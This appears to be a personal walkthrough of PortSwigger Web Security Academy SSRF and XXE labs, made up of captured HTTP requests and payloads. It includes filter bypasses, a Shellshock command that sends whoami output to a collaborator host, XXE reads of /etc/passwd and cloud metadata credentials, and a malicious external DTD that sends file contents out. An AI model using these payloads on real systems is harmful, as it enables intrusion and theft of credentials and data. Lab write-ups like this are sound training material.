User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a64008904342da18004175b007f00ec.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a64008904342da18004175b007f00ec.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=KPWArg1rlSYSP2gZWhS3QGG4w684zBT3

stockApi=http://192.168.0.$X$:8080/admin/

So we will add this to automate and start attack and we will filter by status code 200,

We get 200 on this IP range, 192.168.0.150 so now again we include delete API and send it and we solve the lab,

POST /product/stock HTTP/1.1
Host: 0a64008904342da18004175b007f00ec.web-security-academy.net
Connection: close
Content-Length: 40
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a64008904342da18004175b007f00ec.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a64008904342da18004175b007f00ec.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=KPWArg1rlSYSP2gZWhS3QGG4w684zBT3

stockApi=http://192.168.0.150:8080/admin/delete?username=carlos

Lab 3: Blind SSRF with out-of-band detection

We will intercept the view product request,

GET /product?productId=1 HTTP/2
Host: 0a2a00a50460650d80759acc00cd001c.web-security-academy.net
Cookie: session=7dFYQWS30mNOvYptqZVWYYr1kiQCl65N
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a2a00a50460650d80759acc00cd001c.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Now we have to replace refere header with our own http/dns server for call back and in this case we will use burp collaborator,
We will replace it with this,

https://fxg6y0ele5p7b5l70q06r7iu6lcc06ov.oastify.com

And after some min we got callback in out collaborator tab, and solved the lab

Lab 4: SSRF with blacklist-based input filter

This lab has a stock check feature which fetches data from an internal system so we fetch request of it and try something on it.

POST /product/stock HTTP/2
Host: 0aa9008404dfa5fa811ab1e600af0083.web-security-academy.net
Cookie: session=FroC7jn7kXGrwyTqqPosH42HNkuxDryA
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0aa9008404dfa5fa811ab1e600af0083.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aa9008404dfa5fa811ab1e600af0083.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

I replace stockApi with some typical payloads of SSRF which is,
- http://127.0.0.1/admin
- http://localhost/admin
- but failed and shows this msg "External stock check blocked for security reasons" with 400 bad request.
So i decided to do brute force with all SSRF variations payloads and I used this payload list in intruder.

And it works perfectly and got 2 payload which works,
- http://127.1
- http://127.0.1
This can be consider as short-hand IP addresses by dropping the zeros

Now simple add /admin/delete?username=carlos and we can to able solve but no there one trick which is that we can't able to access /admin so it blocks the request,

So i tried multiple and this is what works,
I double encode the a character and place it,

a -> %61 -> %25%36%31

Now we can do this /admin/delete?username=carlos and it worked,

Lab 5: SSRF with filter bypass via open redirection vulnerability

We have to again check stocks feature and capture the req,

POST /product/stock HTTP/2
Host: 0a81004704f58371828d3aca003900ba.web-security-academy.net
Cookie: session=ygzRzmhRAOCMgtWwlxpb6NN6oEpW7XwJ
Content-Length: 65
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a81004704f58371828d3aca003900ba.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a81004704f58371828d3aca003900ba.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

stockApi=%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1

URL decoded stockAPI, and this time this is only path and parameters,

/product/stock/check?productId=1&storeId=1

As description says, =="The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first."==
So i tried to find some request like that and i found one when we do Next product and capture that request,

GET /product/nextProduct?currentProductId=2&path=/product?productId=3 HTTP/2
Host: 0a81004704f58371828d3aca003900ba.web-security-academy.net
Cookie: session=zZHgN95G7oq4VGrrY1NZK3HcXccfbGBs; session=ygzRzmhRAOCMgtWwlxpb6NN6oEpW7XwJ
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a81004704f58371828d3aca003900ba.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

This GET parameters can be pass directly to that post request because it is using this same endpoint and querying and in this endpoint there is one parameter named path where we can inject out URL,

/product/nextProduct?currentProductId=2&path=/product?productId=3

/product/nextProduct?currentProductId=2&path=http://192.168.0.12:8080/admin?productId=3?

if we send req with with this upper parameters then it will redirect us to that page which is open redirect vulnerability and we have to chain this with SSRF,
so we have to take this and put that into previous stockAPI parameter and it works and we got 200 OK so it means we inject our URL indirectly in another parameters,
==so we bypass the relative path check and also add url==

Now we can add delete user parameters and we will solve the lab, /admin/delete?username=carlos

stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

Lab 6: Blind SSRF with Shellshock exploitation

As per description, we have to grep productID req and change its referer with out collab domain which is 1jlskm070rbtxr7tmcmsdt4gs7yymtai.oastify.com

GET /product?productId=1 HTTP/2
Host: 0ae40005040d22ca8156c5b4006c00c5.web-security-academy.net
Cookie: session=GfmFWgnW9V0VoouvfAGFoQnwcRKqrfRI
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ae40005040d22ca8156c5b4006c00c5.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Referer: https://1jlskm070rbtxr7tmcmsdt4gs7yymtai.oastify.com

And we got response in out collab,

Now we have to exploit shellshock vulnerability,
This is the classic Shellshock payload, where we can inject any command in ANY_COMMAND

() { :;}; ANY_COMMAND

In our case we have blind SSRF so we have to get callback of DNS/HTTP into collaborators along with name of OS user so here is the whole payload,

() { :;}; curl http://g3k741kmk6v8h6r86r67x8ovcmid6auz.oastify.com/`whoami`

Now we will add this into User-Agent header from which it execute this,
(Reference Related to ShellShock.....)
And it is on internal server with some ip with this range, 192.168.0.X:8080 so we have to brute force that,
Here is the full request and we will start brute force in intruder.

GET /product?productId=1 HTTP/2
Host: 0ae40005040d22ca8156c5b4006c00c5.web-security-academy.net
Cookie: session=GfmFWgnW9V0VoouvfAGFoQnwcRKqrfRI
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: () { :;}; curl http://2gjthnx8xs8uus4ujdjtau1hp8vzjqaez.oastify.com/`whoami`
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://192.168.0.X:8080/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Starting the attack

We got response in collaborator and got the OS user name, and by submitting this we solve the lab

peter-3kO3iK.nvmew8ctcdnf9djfyyyepfg24takybvzk.oastify.com.

peter-3kO3iK

[!summary] trigger a blind SSRF from the app (which fetches the Referer URL) to an internal 192.168.0.X:8080 host and use a Shellshock payload (in a header) to make that internal server perform a DNS lookup to my Burp Collaborator domain, the DNS request will contain the OS username, which you then submit to finish the lab

Lab 7: SSRF with whitelist-based input filter

We have to do SSRF on same parameter as previous which is /product/stock and here is the captured request of it,

POST /product/stock HTTP/1.1
Host: 0af50028036541f181472afa005c0005.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0af50028036541f181472afa005c0005.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0af50028036541f181472afa005c0005.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=AWpvTcTmRbPBK0aq7Tr7qEvnKpkL0LmS

stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

We will try to inject URL in stockAPI,

POST /product/stock HTTP/1.1
Host: 0af50028036541f181472afa005c0005.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0af50028036541f181472afa005c0005.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0af50028036541f181472afa005c0005.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=AWpvTcTmRbPBK0aq7Tr7qEvnKpkL0LmS

stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin

%2523 ==> Double Encoded # and it help to identify the fragment,

stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin

This is just backend functionality which might looks like this,

parsed = urlparse(stockApi)
if parsed.hostname != "stock.weliketoshop.net":
    return error("External stock check host must be stock.weliketoshop.net")

[!summary] In short, serve is checking stock.weliketoshop.net string before validating %2523 and hostname must not be localhost so we bypass it using # symbol. When this double-decoding happens, the URL parser now treats everything after @ (userinfo separator) as path, not fragment.

So now we have to delete the user and it will solve the lab,

stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

PortsWigger XML eXternal Entity Injection (XXE) Labs - November 2025

Sun, 16 Nov 2025 00:00:00 GMT

XML external entity (XXE) injection

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data.
It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

What is DTD in XML

The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional DOCTYPE element at the start of the XML document.
The DTD can be fully self-contained within the document itself (known as an =="internal DTD")== or can be loaded from elsewhere ==(known as an "external DTD")== or can be hybrid of the two.

Lab 1: Exploiting XXE using external entities to retrieve files

This website have Check Stock feature which is parsing XML input and return some value so we have to perform attack on it.
We will clock check stock and capture the req,

POST /product/stock HTTP/1.1
Host: 0a1d00120396b19f80a1266b002600b6.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/xml
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a1d00120396b19f80a1266b002600b6.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a1d00120396b19f80a1266b002600b6.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=tNViPEyPjgdD1alEAOyHvMjC4Qdf6RDx

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>
		1
	</productId>
	<storeId>
		1
	</storeId>
</stockCheck>

So we will inject out payload inside DTD which will lead to LFI and leak of /etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Here is the complete request,

POST /product/stock HTTP/1.1
Host: 0a1d00120396b19f80a1266b002600b6.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/xml
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a1d00120396b19f80a1266b002600b6.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a1d00120396b19f80a1266b002600b6.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=tNViPEyPjgdD1alEAOyHvMjC4Qdf6RDx

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

daemon: x: 1: 1: daemon: /usr/sbin: /usr/sbin / nologin
bin: x: 2: 2: bin: /bin:/usr / sbin / nologin
sys: x: 3: 3: sys: /dev:/usr / sbin / nologin
sync: x: 4: 65534: sync: /bin:/bin / sync
games: x: 5: 60: games: /usr/games: /usr/sbin / nologin
man: x: 6: 12: man: /var/cache / man: /usr/sbin / nologin
lp: x: 7: 7: lp: /var/spool / lpd: /usr/sbin / nologin
mail: x: 8: 8: mail: /var/mail: /usr/sbin / nologin
news: x: 9: 9: news: /var/spool / news: /usr/sbin / nologin
uucp: x: 10: 10: uucp: /var/spool / uucp: /usr/sbin / nologin
proxy: x: 13: 13: proxy: /bin:/usr / sbin / nologin
www - data: x: 33: 33: www - data: /var/www: /usr/sbin / nologin
backup: x: 34: 34: backup: /var/backups: /usr/sbin / nologin
list: x: 38: 38: Mailing List Manager: /var/list: /usr/sbin / nologin
irc: x: 39: 39: ircd: /var/run / ircd: /usr/sbin / nologin
gnats: x: 41: 41: Gnats Bug - Reporting System(admin): /var/lib / gnats: /usr/sbin / nologin
nobody: x: 65534: 65534: nobody: /nonexistent:/usr / sbin / nologin
_apt: x: 100: 65534::/nonexistent:/usr / sbin / nologin
peter: x: 12001: 12001::/home/peter: /bin/bash
carlos: x: 12002: 12002::/home/carlos: /bin/bash
user: x: 12000: 12000::/home/user: /bin/bash
elmer: x: 12099: 12099::/home/elmer: /bin/bash
academy: x: 10000: 10000::/academy:/bin / bash
messagebus: x: 101: 101::/nonexistent:/usr / sbin / nologin
dnsmasq: x: 102: 65534: dnsmasq, , ,: /var/lib / misc: /usr/sbin / nologin
systemd - timesync: x: 103: 103: systemd Time Synchronization, , ,: /run/systemd: /usr/sbin / nologin
systemd - network: x: 104: 105: systemd Network Management, , ,: /run/systemd: /usr/sbin / nologin
systemd - resolve: x: 105: 106: systemd Resolver, , ,: /run/systemd: /usr/sbin / nologin
mysql: x: 106: 107: MySQL Server, , ,: /nonexistent:/bin / false
postgres: x: 107: 110: PostgreSQL administrator, , ,: /var/lib / postgresql: /bin/bash
usbmux: x: 108: 46: usbmux daemon, , ,: /var/lib / usbmux: /usr/sbin / nologin
rtkit: x: 109: 115: RealtimeKit, , ,: /proc:/usr / sbin / nologin
mongodb: x: 110: 117::/var/lib / mongodb: /usr/sbin / nologin
avahi: x: 111: 118: Avahi mDNS daemon, , ,: /var/run / avahi - daemon: /usr/sbin / nologin
cups - pk - helper: x: 112: 119: user
for cups - pk - helper service, , ,: /home/cups - pk - helper: /usr/sbin / nologin
geoclue: x: 113: 120::/var/lib / geoclue: /usr/sbin / nologin
saned: x: 114: 122::/var/lib / saned: /usr/sbin / nologin
colord: x: 115: 123: colord colour management daemon, , ,: /var/lib / colord: /usr/sbin / nologin
pulse: x: 116: 124: PulseAudio daemon, , ,: /var/run / pulse: /usr/sbin / nologin
gdm: x: 117: 126: Gnome Display Manager: /var/lib / gdm3: /bin/false

Lab 2: Exploiting XXE to Perform SSRF attacks

We have to capture the Check Stock req so here it is,

POST /product/stock HTTP/1.1
Host: 0a36002504a4e18b8084172c00b7004d.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/xml
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a36002504a4e18b8084172c00b7004d.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a36002504a4e18b8084172c00b7004d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=G29ap0qjBobfyLLmtbShcqZmdVyRbdjE

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>
		1
	</productId>
	<storeId>
		1
	</storeId>
</stockCheck>

It here the Payload which we will inject into out req,

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

POST /product/stock HTTP/1.1
Host: 0a36002504a4e18b8084172c00b7004d.web-security-academy.net
Connection: keep-alive
Content-Length: 107
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
Content-Type: application/xml
sec-ch-ua-mobile: ?0
Accept: */*
Origin: https://0a36002504a4e18b8084172c00b7004d.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a36002504a4e18b8084172c00b7004d.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Cookie: session=G29ap0qjBobfyLLmtbShcqZmdVyRbdjE


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

We successfully get IAM Secret Access Key

{
"Code": "Success",
"LastUpdated": "2025-11-10T06:07:56.118511689Z",
"Type": "AWS-HMAC",
"AccessKeyId": "MfZuA9JCkkhYdijn3ei5",
"SecretAccessKey": "LaPTGVYvMsc09Kr9teV9yEMAD6xATbLmhr8FkBPz",
"Token": "065Ji5oKMvuDFPvdjXVVDuqcjjcsGOZ7FifalsHnyXyAxgG7m9zBm27hTLEpsvF4O1laq97Z3MB8XuQ1r9Kft4UPRzNw8mwfv7qXSVDP781bjSNIgyflIU3KhblmuOJ9pX6aubpxiPkD7rp96XWMfxEiDv2875t0nF6nLjb2Shy9NPw4s73FHgNrTwZfGTgfrHdlyuIe5WbZitaJU7bwmjPxNWhF0xBkkzSnXAxryHjfsOYb5PAYq7L4Kk5byifP",
"Expiration": "2031-11-09T06:07:56.118511689Z"
}

Lab 3: Blind XXE with out-of-band interaction

So as previous lab we have to capture /product/stock endpoint which is sending XML data to server so we can try there our payload,

POST /product/stock HTTP/2
Host: 0aaf0067032459d785d0545f00eb0031.web-security-academy.net
Cookie: session=zkqwjVuhCv09McN6crtfjZPRlB7IACy0
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0aaf0067032459d785d0545f00eb0031.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aaf0067032459d785d0545f00eb0031.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

Since this is blind XXE so we can replace xml with this payload which contains burp collaborator url,
It made req to that url and if we get then we have xxe working

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://ccsipkjptbut4x6e5u9u42y8szyqmga5.oastify.com/xxe-test">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

We got response in collab, and there is motive of this lab so we solved the lab.

Lab 4: Lab: Blind with out-of-band interaction via XML parameter entities

Again we capture the /product/stock req and see what's in it,

POST /product/stock HTTP/2
Host: 0ad000a50319f45784c10f9b006d000f.web-security-academy.net
Cookie: session=Qu0LiaEWo8Ub2dojX5vysj2kzFlUVEoy
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0ad000a50319f45784c10f9b006d000f.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ad000a50319f45784c10f9b006d000f.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

I tried previous payload but got blocked so we have to try different tag to bypass this,

After trying multiple things this works,
These are Parameter Entities (%entity)
Parameter entities:
- Start with %
- Are used inside DTDs only
- Never appear in the final XML content
- Are often not blocked, because most filters only target general entities (&name;)
Since your external DTD does not contain harmful instructions (only a URL), the parser just makes the OOB call.

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % ext SYSTEM "http://1fh7s9mew0xi7m938jcj7r1xvo1fp6dv.oastify.com/xxe-test">
  %ext;
]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

And we solve the lab by doing this,

Lab 5: Exploiting blind XXE to exfiltrate data using a malicious external DTD

We have to exfiltrate the /etc/host content to solve this lab so first we capture the /product/stock req,

POST /product/stock HTTP/2
Host: 0a4d009903fedb1180966766003e0092.web-security-academy.net
Cookie: session=IwehDMHwI98PLuxNiOrLxxiEWjZR2231
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a4d009903fedb1180966766003e0092.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4d009903fedb1180966766003e0092.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

So to solve this challenge we have to host out exploit server which contains this exploit so exfiltrate /etc/hostnames with this collab url bydhbj5ofagsqwsdrtvtq1k7eykp8hw6.oastify.com,
It renders hostname file using file:/// protocol and append it to our burp endpoint with any random parameters so this will send data through url,
we store this file in exploit server, and we do view exploit and copy that url,

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://bydhbj5ofagsqwsdrtvtq1k7eykp8hw6.oastify.com/?x=%file;'>">
%eval;
%exfil;

https://exploit-0ac300340382db7880c8665101af0032.exploit-server.net/exploit

Now we have to embed above url in actual xml payload which pull this DTD from our server and executes it,

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "https://exploit-0ac300340382db7880c8665101af0032.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

hostname is c0777275c175 and after submit this solution we solve the lab,

Lab 6: Exploiting blind XXE to retrieve data via error messages

To solve this lab we have to display content of /etc/passwd so here is /product/stock req,

POST /product/stock HTTP/2
Host: 0ada00680388a92782c598eb00f3006b.web-security-academy.net
Cookie: session=dN909puMGZnPHSlv3I3NPE72CsGIZkgN
Content-Length: 107
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
Origin: https://0ada00680388a92782c598eb00f3006b.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ada00680388a92782c598eb00f3006b.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>1</storeId>
</stockCheck>

This is exploit hosted on exploit sever,

